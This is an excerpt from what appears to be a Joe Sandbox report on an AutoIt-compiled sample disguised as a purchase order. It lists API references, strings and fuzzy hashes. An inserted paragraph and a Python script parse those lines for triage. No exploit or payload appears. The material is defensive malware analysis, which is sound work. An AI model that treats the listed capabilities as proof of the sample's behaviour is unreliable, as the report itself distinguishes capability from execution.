                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 762d0ce4e2ca9d2157ae612c5ed97a91bd28584c7328da1ec2b15b5f2b2ac5a8
                        • Instruction ID: 00a0bc0f7fadaac753ca70a881f87afe4d1edb1379ecc29ff96a10a9908916e5
                        • Opcode Fuzzy Hash: 762d0ce4e2ca9d2157ae612c5ed97a91bd28584c7328da1ec2b15b5f2b2ac5a8
                        • Instruction Fuzzy Hash: 4EB1BF71618301AFDB05DF24D885BAABBF5FF88310F048A1DF5999B291DB70E844CB91
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002CA839
                        • GetSystemMetrics.USER32(00000007), ref: 002CA841
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002CA86C
                        • GetSystemMetrics.USER32(00000008), ref: 002CA874
                        • GetSystemMetrics.USER32(00000004), ref: 002CA899
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002CA8B6
                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 002CA8C6
                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002CA8F9
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002CA90D
                        • GetClientRect.USER32(00000000,000000FF), ref: 002CA92B
                        • GetStockObject.GDI32(00000011), ref: 002CA947
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002CA952
                          • Part of subcall function 002CB736: GetCursorPos.USER32(000000FF), ref: 002CB749
                          • Part of subcall function 002CB736: ScreenToClient.USER32(00000000,000000FF), ref: 002CB766
                          • Part of subcall function 002CB736: GetAsyncKeyState.USER32(00000001), ref: 002CB78B
                          • Part of subcall function 002CB736: GetAsyncKeyState.USER32(00000002), ref: 002CB799
                        • SetTimer.USER32(00000000,00000000,00000028,002CACEE), ref: 002CA979
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: c68df189f29e69dbe34132a3ba1aa971444643d354182aa3656e8fbc9257c638
                        • Instruction ID: a6eb0907152df92792a4d3ee8a635e57d85e584011c3b22710c67265361c8716
                        • Opcode Fuzzy Hash: c68df189f29e69dbe34132a3ba1aa971444643d354182aa3656e8fbc9257c638
                        • Instruction Fuzzy Hash: EBB19E32A1020AEFDB15DFA8DC86FAD7BB8FB08314F114229FA19A7290D774D851CB51
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00313626
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0034DBF0,00000000,?,00000000,?,?), ref: 00313694
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003136DC
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00313765
                        • RegCloseKey.ADVAPI32(?), ref: 00313A85
                        • RegCloseKey.ADVAPI32(00000000), ref: 00313A92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        • Opcode ID: ff2fce530fb96eed41a7bc4cb0e43809a01baae512ee590410e6d8c0880d1c0a
                        • Instruction ID: 72ea48c17352b38aa2ecbebdd075887fd4bbc1f50035d3e3777c3634fe8e8c4e
                        • Opcode Fuzzy Hash: ff2fce530fb96eed41a7bc4cb0e43809a01baae512ee590410e6d8c0880d1c0a
                        • Instruction Fuzzy Hash: E80257752106019FCB19EF24C891EAAB7E9EF88760F05845DF89A9B3A1DB30ED51CF41
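The block above is the registry-write path of the AutoIt v3 runtime that this sample is compiled with (the REG_SZ/REG_DWORD/REG_BINARY type strings are the ones AutoIt's RegWrite accepts). A reference like this proves the capability is present in the interpreter, not that the embedded script exercises it; the dynamic sections of the report are the record of what actually ran. The following Python is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses the `• Api.MODULE(args), ref: ADDR` reference lines into a usable structure, converts each `ref` virtual address to an RVA using the image base stated in the report's `Offset: 002B0000` line, and tags functions with a small, hypothetical table of APIs worth a closer look. The sample input is constructed from lines copied out of several of the blocks on this page so that every line shape (with and without arguments, `Part of subcall function`, CRT calls) is covered.

```python
import re
from collections import defaultdict

# Image base of the dumped module, taken from the report's "Offset: 002B0000" line.
IMAGE_BASE = 0x002B0000

# Constructed sample: reference lines copied from several function blocks in the
# report above (registry block, tooltip block, a subcall line, a CRT call), mixed
# together only to exercise every line shape the parser must handle.
SAMPLE_LINES = """
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00313626
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0034DBF0,00000000,?,00000000,?,?), ref: 00313694
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003136DC
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00313765
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0031CE04
• GetDesktopWindow.USER32 ref: 0031CEB9
  • Part of subcall function 002CB155: GetWindowLongW.USER32(?,000000EB), ref: 002CB166
• _wcscmp.LIBCMT ref: 002EDE3B
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Hypothetical tag table (my choice for triage, not a Joe Sandbox classification).
TAGS = {
    "RegSetValueExW": "registry-write",
    "RegCreateKeyExW": "registry-write",
    "LoadLibraryExW": "dynamic-load",
    "DragQueryFileW": "dropped-file-path",
    "CreateWindowExW": "gui",
}


def parse_api_refs(text):
    """Parse report lines of the form '• Api.MODULE(args), ref: ADDR'.

    Hex arguments become ints, '?' (unknown at analysis time) becomes None,
    anything else (e.g. the window class tooltips_class32) is kept as a string.
    Header lines such as 'APIs' or 'Strings' are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                if a == "?":
                    args.append(None)
                elif HEX_RE.match(a):
                    args.append(int(a, 16))
                else:
                    args.append(a)
        ref = int(m.group("ref"), 16)
        out.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": ref,
            "rva": ref - IMAGE_BASE,  # offset inside the dumped image
            "parent": int(m.group("parent"), 16) if m.group("parent") else None,
        })
    return out


def summarize(refs):
    """Group the function's own (non-subcall) API references by module, collect
    literal string arguments, and apply the tag table."""
    by_module = defaultdict(set)
    literals = set()
    tags = set()
    for r in refs:
        if r["parent"] is not None:
            continue  # belongs to a callee, not this function
        by_module[r["module"]].add(r["api"])
        literals.update(a for a in r["args"] if isinstance(a, str))
        if r["api"] in TAGS:
            tags.add(TAGS[r["api"]])
    return {
        "by_module": {m: sorted(v) for m, v in sorted(by_module.items())},
        "literals": sorted(literals),
        "tags": sorted(tags),
    }


if __name__ == "__main__":
    parsed = parse_api_refs(SAMPLE_LINES)
    for r in parsed:
        print(f"{r['api']:<22}{r['module']:<10}VA {r['ref']:08X}  RVA {r['rva']:06X}")
    print(summarize(parsed))
```

Feed it the API lines of one block at a time to get a per-function view; the RVA is what you need to locate the same code in the `.sdmp` dump or in the unpacked PE, since the report's `ref` values are virtual addresses at the dump's load base.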
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00316A52
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00316B12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 3974292440-719923060
                        • Opcode ID: c2162e340b661794a07f33ed324435dcd0b35ccd3e56e973934c253a695d2a86
                        • Instruction ID: 4eb52daf10184dd5a2632a9d71e34c59d9384f33315b428c043928d5d146181f
                        • Opcode Fuzzy Hash: c2162e340b661794a07f33ed324435dcd0b35ccd3e56e973934c253a695d2a86
                        • Instruction Fuzzy Hash: CFA172342642019BCB09EF54C952FAAB3E6EF48354F14896DB8A69B3D2DB30EC55CF41
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 002EDD87
                        • __swprintf.LIBCMT ref: 002EDE28
                        • _wcscmp.LIBCMT ref: 002EDE3B
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002EDE90
                        • _wcscmp.LIBCMT ref: 002EDECC
                        • GetClassNameW.USER32(?,?,00000400), ref: 002EDF03
                        • GetDlgCtrlID.USER32(?), ref: 002EDF55
                        • GetWindowRect.USER32(?,?), ref: 002EDF8B
                        • GetParent.USER32(?), ref: 002EDFA9
                        • ScreenToClient.USER32(00000000), ref: 002EDFB0
                        • GetClassNameW.USER32(?,?,00000100), ref: 002EE02A
                        • _wcscmp.LIBCMT ref: 002EE03E
                        • GetWindowTextW.USER32(?,?,00000400), ref: 002EE064
                        • _wcscmp.LIBCMT ref: 002EE078
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                        • String ID: %s%u
                        • API String ID: 3119225716-679674701
                        • Opcode ID: 0d64d07f8b9e0e283918fe41453c1ee076f2fd95fdbe991f59818a174e6d0930
                        • Instruction ID: 61c900daed1d61e2a0def35490eb2d846701dae20d221793c936c6c4bd2a0c1f
                        • Opcode Fuzzy Hash: 0d64d07f8b9e0e283918fe41453c1ee076f2fd95fdbe991f59818a174e6d0930
                        • Instruction Fuzzy Hash: 21A1F231264747EBDB15DF21C884BAAB7A8FF04350F808529F9A9D3190EB70E925CB91
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 002EE6E1
                        • _wcscmp.LIBCMT ref: 002EE6F2
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 002EE71A
                        • CharUpperBuffW.USER32(?,00000000), ref: 002EE737
                        • _wcscmp.LIBCMT ref: 002EE755
                        • _wcsstr.LIBCMT ref: 002EE766
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002EE79E
                        • _wcscmp.LIBCMT ref: 002EE7AE
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 002EE7D5
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002EE81E
                        • _wcscmp.LIBCMT ref: 002EE82E
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 002EE856
                        • GetWindowRect.USER32(00000004,?), ref: 002EE8BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        • Opcode ID: b01b26dcdd86ba5de38eba1f1464ee2bf40f496790baec19611f2eaecf981d9e
                        • Instruction ID: 3efc25aa6971e312c8e3cfb96e278fbf05a2d75034e52203c4ed3eb66c017665
                        • Opcode Fuzzy Hash: b01b26dcdd86ba5de38eba1f1464ee2bf40f496790baec19611f2eaecf981d9e
                        • Instruction Fuzzy Hash: AE81F2310283869BDF01CF11C881FAABBE8FF54354F54846AFD999A096DB30DD65CBA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        • Opcode ID: 57bba90868cc04e2a4c66367997da6ff617689a52d01d489cc4e4a9d42c852f1
                        • Instruction ID: da2e5e6d02fd36d1e71f42478f6f09885df1bcc5d17ec906ee1512f084d7c4e6
                        • Opcode Fuzzy Hash: 57bba90868cc04e2a4c66367997da6ff617689a52d01d489cc4e4a9d42c852f1
                        • Instruction Fuzzy Hash: 9831C031AA4606A6DB15EB61CD13EEE73A49F20784FA14026F441710DAFF916F34CA51
                        APIs
                        • LoadIconW.USER32(00000063), ref: 002EF8AB
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002EF8BD
                        • SetWindowTextW.USER32(?,?), ref: 002EF8D4
                        • GetDlgItem.USER32(?,000003EA), ref: 002EF8E9
                        • SetWindowTextW.USER32(00000000,?), ref: 002EF8EF
                        • GetDlgItem.USER32(?,000003E9), ref: 002EF8FF
                        • SetWindowTextW.USER32(00000000,?), ref: 002EF905
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002EF926
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002EF940
                        • GetWindowRect.USER32(?,?), ref: 002EF949
                        • SetWindowTextW.USER32(?,?), ref: 002EF9B4
                        • GetDesktopWindow.USER32 ref: 002EF9BA
                        • GetWindowRect.USER32(00000000), ref: 002EF9C1
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002EFA0D
                        • GetClientRect.USER32(?,?), ref: 002EFA1A
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002EFA3F
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002EFA6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: 385168b1628f32b96324ebb5b4588f71f4251c0d700fde67d4c03d6678845cbd
                        • Instruction ID: 7e48ea9fe834a3c25e56fe563cb79e8ec427b5ee0699c8c98131522dd93cc484
                        • Opcode Fuzzy Hash: 385168b1628f32b96324ebb5b4588f71f4251c0d700fde67d4c03d6678845cbd
                        • Instruction Fuzzy Hash: 6C518E7090070AAFDB21DFA9DE86F6EBBF9FF04704F404928E596A65A1C774A854CF00
                        APIs
                        • _memset.LIBCMT ref: 0031CD0B
                        • DestroyWindow.USER32(?,?), ref: 0031CD83
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0031CE04
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0031CE26
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031CE35
                        • DestroyWindow.USER32(?), ref: 0031CE52
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002B0000,00000000), ref: 0031CE85
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031CEA4
                        • GetDesktopWindow.USER32 ref: 0031CEB9
                        • GetWindowRect.USER32(00000000), ref: 0031CEC0
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0031CED2
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0031CEEA
                          • Part of subcall function 002CB155: GetWindowLongW.USER32(?,000000EB), ref: 002CB166
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        • Opcode ID: b93e4f20cbec69d126cc9bbab12bd5d3cd5ed041db2b2b5978d68d97dc84c1b6
                        • Instruction ID: aff2588af4b2efd56a0aac77b5f2b8574e025cf4c88ae7c4cbc75104657e4c23
                        • Opcode Fuzzy Hash: b93e4f20cbec69d126cc9bbab12bd5d3cd5ed041db2b2b5978d68d97dc84c1b6
                        • Instruction Fuzzy Hash: 5F71DF711A0309AFD72ACF68CC85FA63BE9FB89744F48051CF985972A1D770E851CB22
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DragQueryPoint.SHELL32(?,?), ref: 0031F14B
                          • Part of subcall function 0031D5EE: ClientToScreen.USER32(?,?), ref: 0031D617
                          • Part of subcall function 0031D5EE: GetWindowRect.USER32(?,?), ref: 0031D68D
                          • Part of subcall function 0031D5EE: PtInRect.USER32(?,?,0031EB2C), ref: 0031D69D
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0031F1B4
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0031F1BF
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0031F1E2
                        • _wcscat.LIBCMT ref: 0031F212
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0031F229
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0031F242
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0031F259
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0031F27B
                        • DragFinish.SHELL32(?), ref: 0031F282
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0031F36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        • Opcode ID: de2822cb3e39afa818efcb05379e93ad0555120200e4dea204545ace639c08c4
                        • Instruction ID: d6dcd508c8d232dca6c25513073229bbac578d888b56d6de34fe27acf7b79f28
                        • Opcode Fuzzy Hash: de2822cb3e39afa818efcb05379e93ad0555120200e4dea204545ace639c08c4
                        • Instruction Fuzzy Hash: BF618A72008300AFC316EF64DC85E9BBBF8FF89750F104A2DF595921A1DB309A59CB52
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 002FB46D
                        • VariantCopy.OLEAUT32(?,?), ref: 002FB476
                        • VariantClear.OLEAUT32(?), ref: 002FB482
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002FB561
                        • __swprintf.LIBCMT ref: 002FB591
                        • VarR8FromDec.OLEAUT32(?,?), ref: 002FB5BD
                        • VariantInit.OLEAUT32(?), ref: 002FB63F
                        • SysFreeString.OLEAUT32(00000016), ref: 002FB6D1
                        • VariantClear.OLEAUT32(?), ref: 002FB727
                        • VariantClear.OLEAUT32(?), ref: 002FB736
                        • VariantInit.OLEAUT32(00000000), ref: 002FB772
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 3730832054-3931177956
                        • Opcode ID: a5cb26b0ba31174d40383446f506b9ccf7a3e4efaee844d5e60f1c0a0d49ba4c
                        • Instruction ID: 651616689a73af594f8e646d39e6c474f5fd54585bd55bad3fdd1a3b0cfb2466
                        • Opcode Fuzzy Hash: a5cb26b0ba31174d40383446f506b9ccf7a3e4efaee844d5e60f1c0a0d49ba4c
                        • Instruction Fuzzy Hash: 09C10371A2021ADBCB129F65D4A4B7AF7B8FF09380F248475E6059B542CBB0EC64DF90
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00316FF9
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00317044
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        • Opcode ID: 5b007a41b417ed761495c2fcd48f40b17bbd7d8e365041a323ca143955c562d7
                        • Instruction ID: df8ddbddaa57da404c76963b080b76af07b4c42017c91ad15f045b7068b6c975
                        • Opcode Fuzzy Hash: 5b007a41b417ed761495c2fcd48f40b17bbd7d8e365041a323ca143955c562d7
                        • Instruction Fuzzy Hash: 8F91A3342143019FCB19EF14C851BAAB7B6AF88354F18896DF8965B392CB31ED5ACF41
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0031E3BB
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00319615,?), ref: 0031E417
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E457
